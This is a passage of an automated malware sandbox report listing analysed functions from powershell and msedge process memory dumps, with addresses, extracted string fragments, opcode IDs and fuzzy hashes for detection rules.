                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2537919887.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_7ff848f30000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: cab455a051f9e590068e8328d34aea88cdd3d74cf8bee2fad0bc97576ba49ed7
                                                                          • Instruction ID: f39de6d84cb6f3b8bca2fbb0d5706ed7747b83ee892f13653449e0b444bacf2e
                                                                          • Opcode Fuzzy Hash: cab455a051f9e590068e8328d34aea88cdd3d74cf8bee2fad0bc97576ba49ed7
                                                                          • Instruction Fuzzy Hash: 7F31EB3191CB488FDB189B5C98066A97BE1FB59710F00416FE449D3692CA70A855CBC6
                                                                          Function 00007FF848F3A73C Relevance: .1, Instructions: 110COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2537919887.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_7ff848f30000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b3a8deb6106a79b54588af80b8ed35e4c82ccc33995566d3f537df2842497ecb
                                                                          • Instruction ID: f77c1cac643c9dcbc82ca6cb98e9f80ecda647bdd86e2d4e78de0549cf15edac
                                                                          • Opcode Fuzzy Hash: b3a8deb6106a79b54588af80b8ed35e4c82ccc33995566d3f537df2842497ecb
                                                                          • Instruction Fuzzy Hash: 5131367180EBC84FE70ACB688C495B97FE0DF23220F0841EFD085CB1A3D669584AC761
                                                                          Function 00007FF848E1EB3F Relevance: .1, Instructions: 54COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2536636342.00007FF848E1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E1D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_7ff848e1d000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 84e4da84efb7a51fce14da70d86f151c2ca1ddb5975049c754ac93f51fb58f0f
                                                                          • Instruction ID: 4083dafcabace0178625f547af713cb3cb53ce79eaed55c9ef40aa5509edcb6f
                                                                          • Opcode Fuzzy Hash: 84e4da84efb7a51fce14da70d86f151c2ca1ddb5975049c754ac93f51fb58f0f
                                                                          • Instruction Fuzzy Hash: 41014F3160CE088F9AA4EF1DE485D5237E0FB98320710065AD41EC765ADB31F892CBC1
                                                                          Function 00007FF848F333B5 Relevance: .0, Instructions: 49COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2537919887.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_7ff848f30000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3e8110072008822f9b851662dbd92c3d0a0b45f8918f2b52d7721439382d7d88
                                                                          • Instruction ID: 1fde1e7c06bd8ad01fde8fdacf519f27676798cf7977af127a8e772823c5939c
                                                                          • Opcode Fuzzy Hash: 3e8110072008822f9b851662dbd92c3d0a0b45f8918f2b52d7721439382d7d88
                                                                          • Instruction Fuzzy Hash: 9501677111CB0C4FD744EF0CE451AA5B7E0FB95364F10056EE58AC3695DB36E882CB45
                                                                          Function 00007FF848F3A0FB Relevance: .0, Instructions: 39COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2537919887.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_7ff848f30000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 761d7f0649ff4fffa6a03006213445ea59cb4583ef1ba848c9dcd7e5398c2279
                                                                          • Instruction ID: 4940f1f258ef73ae851790f28cc7575952fb51cfcf6b47f5b557a2127b1914ac
                                                                          • Opcode Fuzzy Hash: 761d7f0649ff4fffa6a03006213445ea59cb4583ef1ba848c9dcd7e5398c2279
                                                                          • Instruction Fuzzy Hash: 86F0627654CA8C4FDB82EB2C98690E97F90EF66255B0501ABD448C7162EB225958CBC2
                                                                          Function 00007FF8490043FA Relevance: .0, Instructions: 37COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2539133043.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_7ff849000000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 25f36c2706fd1cebbff61f80a4ad043f7f17a2168e1000e3b275b101cb9c844b
                                                                          • Instruction ID: 063650b0cece792fb44425b407951967876574dbdf24a8dec9c1a086add93e76
                                                                          • Opcode Fuzzy Hash: 25f36c2706fd1cebbff61f80a4ad043f7f17a2168e1000e3b275b101cb9c844b
                                                                          • Instruction Fuzzy Hash: 73F09A31A0C5858FDB64EF1CA4448A8B7E0FF05361B0500F6E159C70A3EB29EC508764

                                                                          Non-executed Functions

                                                                          Function 00007FF848F38BF2 Relevance: 10.1, Strings: 8, Instructions: 85COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2537919887.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_7ff848f30000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: L_^8$L_^<$L_^?$L_^J$L_^K$L_^N$L_^Q$L_^Y
                                                                          • API String ID: 0-1415242001
                                                                          • Opcode ID: 5aa45f25855d28f509cadb7d87cf5c2844d172bec0cabcb8852c2e4ec1c355e1
                                                                          • Instruction ID: 208ff562fc9593e1c1eac2d9eee7fc3ebff388127ed0e92e8ac16a561240a24b
                                                                          • Opcode Fuzzy Hash: 5aa45f25855d28f509cadb7d87cf5c2844d172bec0cabcb8852c2e4ec1c355e1
                                                                          • Instruction Fuzzy Hash: 882107736155159AC201376DB8415EE7790EF543B874552F3E218CF113DF2CA48B8A94

                                                                          Executed Functions

                                                                          Function 00007FF848F11689 Relevance: 3.0, Strings: 2, Instructions: 503COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.2714526363.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_7ff848f10000_msedge.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: O_L$Z_H
                                                                          • API String ID: 0-1366185927
                                                                          • Opcode ID: c961253eb0d87eeedda4a35a667755484c652a0323eb8adb255b57f642ee72b4
                                                                          • Instruction ID: 2fcee0220ec2685b97617d2f774ffe84f29059663e37fb3639cb417ddcfda5a0
                                                                          • Opcode Fuzzy Hash: c961253eb0d87eeedda4a35a667755484c652a0323eb8adb255b57f642ee72b4
                                                                          • Instruction Fuzzy Hash: 20F1BF30A2DA195FE798FB3884696B976E2FF88791F400579E40EC32C2DF2CAC458755
                                                                          Function 00007FF848F11145 Relevance: .6, Instructions: 607COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.2714526363.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_7ff848f10000_msedge.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a46d05ade27fe90f7c67cec0fab638d07beb733bba8f053c6ea33f5099289121
                                                                          • Instruction ID: da42875af42ed3e1f749d74ea1728c0cc9002e5e26a5f231edcd5ef2d3f4c84c
                                                                          • Opcode Fuzzy Hash: a46d05ade27fe90f7c67cec0fab638d07beb733bba8f053c6ea33f5099289121
                                                                          • Instruction Fuzzy Hash: 6F417C32D1E69A5FD741F768A8A11EABBB0FF86254F0401B7C049DB1D3DF2C684A8764
                                                                          Function 00007FF848F10BFE Relevance: .2, Instructions: 193COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.2714526363.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_7ff848f10000_msedge.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d7a0c1f65acc9b86c318c63ecd9c2c0062d85d9d1f394f70016046877664ff7e
                                                                          • Instruction ID: 4968a9714e3bac2a55de465e2f84790714de1f98edfe513883e43f9f1060314e
                                                                          • Opcode Fuzzy Hash: d7a0c1f65acc9b86c318c63ecd9c2c0062d85d9d1f394f70016046877664ff7e
                                                                          • Instruction Fuzzy Hash: 49512321A1EAC61FE356B73858262B57FE2EF86650B0901FBD88CC72D7DD1C5C468352
                                                                          Function 00007FF848F11DFD Relevance: .2, Instructions: 192COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.2714526363.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_7ff848f10000_msedge.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e7b00edd750c01c36f24e1ed88650025e7beb5885455ceeeadd82107217bc0b2
                                                                          • Instruction ID: 3dd189bc9d1471d0eff9ef79600916dc3efdf5b83a154a91cab80ed1c51f171f
                                                                          • Opcode Fuzzy Hash: e7b00edd750c01c36f24e1ed88650025e7beb5885455ceeeadd82107217bc0b2
                                                                          • Instruction Fuzzy Hash: 7551EE20A1EAC95FD786AB785824276BFD1EF9A355F0805BBE089C71D3CE085C46C356
                                                                          Function 00007FF848F11138 Relevance: .2, Instructions: 168COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.2714526363.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_7ff848f10000_msedge.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8b1724d57351a57f5dd42eb50f26b9af081ea543b3e449824856ee96ce7413ad
                                                                          • Instruction ID: bcea202feaccd5dd8b08ed9da6e5226b2ab9e77b9f9b7ef3a981619976d8ec8a
                                                                          • Opcode Fuzzy Hash: 8b1724d57351a57f5dd42eb50f26b9af081ea543b3e449824856ee96ce7413ad
                                                                          • Instruction Fuzzy Hash: 6B513930A2991A5FEB98B77890697BD76A2FF88351F900479E80EC33C6DF2C6C458754
                                                                          Function 00007FF848F10540 Relevance: .1, Instructions: 139COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.2714526363.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_7ff848f10000_msedge.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0a92792795957b6f21a67e92784380a063be6d1f5ba9d200d6c14ec3feba3618
                                                                          • Instruction ID: 55c9ea57f36e3294f463abfa0396b08c447b6a945ff8b554bd652f8abf38659d
                                                                          • Opcode Fuzzy Hash: 0a92792795957b6f21a67e92784380a063be6d1f5ba9d200d6c14ec3feba3618
                                                                          • Instruction Fuzzy Hash: F7319F21B2D9491FE698EB2C946A379A6C2EFD9755F0405BAE00EC32D3DE28AC458345
                                                                          Function 00007FF848F10A91 Relevance: .1, Instructions: 125COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.2714526363.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_7ff848f10000_msedge.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7468f6472e445ca26d7f14afdb605aace80bab3c959b131f183e0e73f7d9f82a
                                                                          • Instruction ID: 1b42a7e3adc96217d4bc86f0db908ecb0499edae6150e71dd5c7577c6c1b257c
                                                                          • Opcode Fuzzy Hash: 7468f6472e445ca26d7f14afdb605aace80bab3c959b131f183e0e73f7d9f82a
                                                                          • Instruction Fuzzy Hash: 9731BE21F2D9595FE784BB6C98593BDA7D2EB98795F04027AE40DC32C3EE2C5C058392
                                                                          Function 00007FF848F10949 Relevance: .1, Instructions: 115COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.2714526363.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_7ff848f10000_msedge.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 97e18b214ddb3ee8e5e8e71ee5c8c01b6de1c0140198ad21f82409e325b4b781
                                                                          • Instruction ID: ba68bb31dd2078d633136616c942cdeb37b3e6d3bf9b95c0bc2c1cb154495c8b
                                                                          • Opcode Fuzzy Hash: 97e18b214ddb3ee8e5e8e71ee5c8c01b6de1c0140198ad21f82409e325b4b781
                                                                          • Instruction Fuzzy Hash: 2731AF34A29A1E9FEB44FB6894656EA7BB1FF98300F50043AD409D32C6CF7C68498764

                                                                          Non-executed Functions

                                                                          Function 00007FF848F10452 Relevance: 5.2, Strings: 4, Instructions: 221COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.2714526363.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_7ff848f10000_msedge.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (xH$>O_^$?O_^$pxH
                                                                          • API String ID: 0-3313541221
                                                                          • Opcode ID: c9b8ebdc8fa6f28a04a7ebb13f3f9c73afe7f370d41357eb71a87b6a27ff6e35
                                                                          • Instruction ID: 07af99619de6bd1f667b61fb154dfe1d3d8f5e109675f616bbe1d2af12a7f91f
                                                                          • Opcode Fuzzy Hash: c9b8ebdc8fa6f28a04a7ebb13f3f9c73afe7f370d41357eb71a87b6a27ff6e35
                                                                          • Instruction Fuzzy Hash: 0251A727B0E6A25FE311B72DB8511E93B60EFC1776B0805B7D684CE093DA1C5C4A82B9

                                                                          Executed Functions

                                                                          Function 00007FF848F31689 Relevance: 3.0, Strings: 2, Instructions: 503COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000E.00000002.2795079853.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_14_2_7ff848f30000_msedge.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: M_L$X_H
                                                                          • API String ID: 0-282035412
                                                                          • Opcode ID: 9c1db1216396a9364b1990a4bb296363b7552b6ceb01113d455d9c02928205d7
                                                                          • Instruction ID: 25be442cc73fb140e2338b471c8df98a799c1c51505cbacac7e5e53982d41f32
                                                                          • Opcode Fuzzy Hash: 9c1db1216396a9364b1990a4bb296363b7552b6ceb01113d455d9c02928205d7
                                                                          • Instruction Fuzzy Hash: 9EF1A231E2DA095FE798FB3884696B976D2FF98754F4001BAE40EC32D6DF2CA8418745
                                                                          Function 00007FF848F31145 Relevance: .6, Instructions: 607COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000E.00000002.2795079853.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_14_2_7ff848f30000_msedge.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c03f0234412570b9559a626e00eea9e14866f3d53e663ef59d934f4d91c1b98c
                                                                          • Instruction ID: dff3e52e46d093daf7cd03aac9fb6ac80cebe6ac8f45faa202aa1bcb66abeb4e
                                                                          • Opcode Fuzzy Hash: c03f0234412570b9559a626e00eea9e14866f3d53e663ef59d934f4d91c1b98c
                                                                          • Instruction Fuzzy Hash: 9F418E32D1E68A9FD742F76898A21EA7BB0FF46254F0402B7D049DB1D3DF2C284A8754
                                                                          Function 00007FF848F30BFE Relevance: .2, Instructions: 193COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000E.00000002.2795079853.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_14_2_7ff848f30000_msedge.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4d7295fef001b753b928b35e4a6f6c13a5163ee12decbc552d3234de5e0f1f82
                                                                          • Instruction ID: 593eab063a67611567e37f6bde7455e33418632fb813b119a32dc1f95a1e0f6f
                                                                          • Opcode Fuzzy Hash: 4d7295fef001b753b928b35e4a6f6c13a5163ee12decbc552d3234de5e0f1f82
                                                                          • Instruction Fuzzy Hash: DF513521A1EAC61FE396B73858261B57FE2EF86690B0901FBD489C72D7CD1C5C468352
                                                                          Function 00007FF848F31DFD Relevance: .2, Instructions: 192COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000E.00000002.2795079853.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_14_2_7ff848f30000_msedge.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e8b9519705c048bdac921da95a58cb95fd6b6911fcc8f8ae81cd29e124d8a666
                                                                          • Instruction ID: ae54f86fbbe89cf12b07a5e5ffc312e821001d42e75a1e10385c5a82fa828f6e
                                                                          • Opcode Fuzzy Hash: e8b9519705c048bdac921da95a58cb95fd6b6911fcc8f8ae81cd29e124d8a666
                                                                          • Instruction Fuzzy Hash: 60511320A1EAC95FD786AB385864276BFD1EF9B255F0801FBE08DC71D3CE085886C346
                                                                          Function 00007FF848F31138 Relevance: .2, Instructions: 168COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000E.00000002.2795079853.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_14_2_7ff848f30000_msedge.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 951655b5e090a2c4be928a33227efe05d2a8e844533b4e61d920a657b3ed6a42
                                                                          • Instruction ID: 8d5d3a7022d4a2d48e1397b1365d17422e8e5b1d49b64357af4f7cf0ed3ee97a
                                                                          • Opcode Fuzzy Hash: 951655b5e090a2c4be928a33227efe05d2a8e844533b4e61d920a657b3ed6a42
                                                                          • Instruction Fuzzy Hash: FD513F30E299199FE784F77880697B966E2FF98354F9004B9E40EC73C6DE2D9C418754
                                                                          Function 00007FF848F30540 Relevance: .1, Instructions: 139COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000E.00000002.2795079853.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_14_2_7ff848f30000_msedge.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e52a61b69b8ff242d0f3d322e10fdb94e2eeba7ee571533ebdc8baec57a1931a
                                                                          • Instruction ID: 78c2c4a1db8147c1eeedf22f2b65e62aa795774e0f6bc3898a9117c412bb270c
                                                                          • Opcode Fuzzy Hash: e52a61b69b8ff242d0f3d322e10fdb94e2eeba7ee571533ebdc8baec57a1931a
                                                                          • Instruction Fuzzy Hash: 18319321B2D9495FE698FB2C9459379B6C2EF99755F0406BAE00EC32D3DE28AC418345
                                                                          Function 00007FF848F30A91 Relevance: .1, Instructions: 125COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000E.00000002.2795079853.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_14_2_7ff848f30000_msedge.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 21d6ee1e09752e937472e105beaf2e172c31308fd09851e22dc2425f5190e4ea
                                                                          • Instruction ID: 0e715d52d96820f89c13d0847433fec0535e1ba7f73b8edcbfbfd31bf2a29c75
                                                                          • Opcode Fuzzy Hash: 21d6ee1e09752e937472e105beaf2e172c31308fd09851e22dc2425f5190e4ea
                                                                          • Instruction Fuzzy Hash: 3C31AE21E2E9499FEB84BB6C58593BDB7D2EB98655F04027BE40DC32D3DE1C58018392
                                                                          Function 00007FF848F30949 Relevance: .1, Instructions: 115COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000E.00000002.2795079853.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_14_2_7ff848f30000_msedge.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: bcfd0b046cda8527a8249e4c7f1f80ac976b1b3cd13bee4b5e6a46db841ffe41
                                                                          • Instruction ID: 9b3f31f2c41d2ae4933a0e5313d73654f12c103d3161cb02ee505863bd5052b3
                                                                          • Opcode Fuzzy Hash: bcfd0b046cda8527a8249e4c7f1f80ac976b1b3cd13bee4b5e6a46db841ffe41
                                                                          • Instruction Fuzzy Hash: 6B31A030E1AA0E9FEB44FB6884556EA7BF1FF98300F5005BAD009D3286CE3DA801C754

                                                                          Non-executed Functions

                                                                          Function 00007FF848F30452 Relevance: 5.2, Strings: 4, Instructions: 223COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000E.00000002.2795079853.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_14_2_7ff848f30000_msedge.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (xH$>M_^$?M_^$pxH
                                                                          • API String ID: 0-1777582537
                                                                          • Opcode ID: 88c9044c975639fce2df28009f901e739446c604066144518d0b3ebbc72503b5
                                                                          • Instruction ID: 81fdafc9aebf433dfb86a57b2480f33a0680f6de4dcf1742a1dd84ce6ed0bc62
                                                                          • Opcode Fuzzy Hash: 88c9044c975639fce2df28009f901e739446c604066144518d0b3ebbc72503b5
                                                                          • Instruction Fuzzy Hash: 86519723B0F69A9FE351B72CB8511F97B60EF82676B0803F7D184CA0D3DA1D544A83A5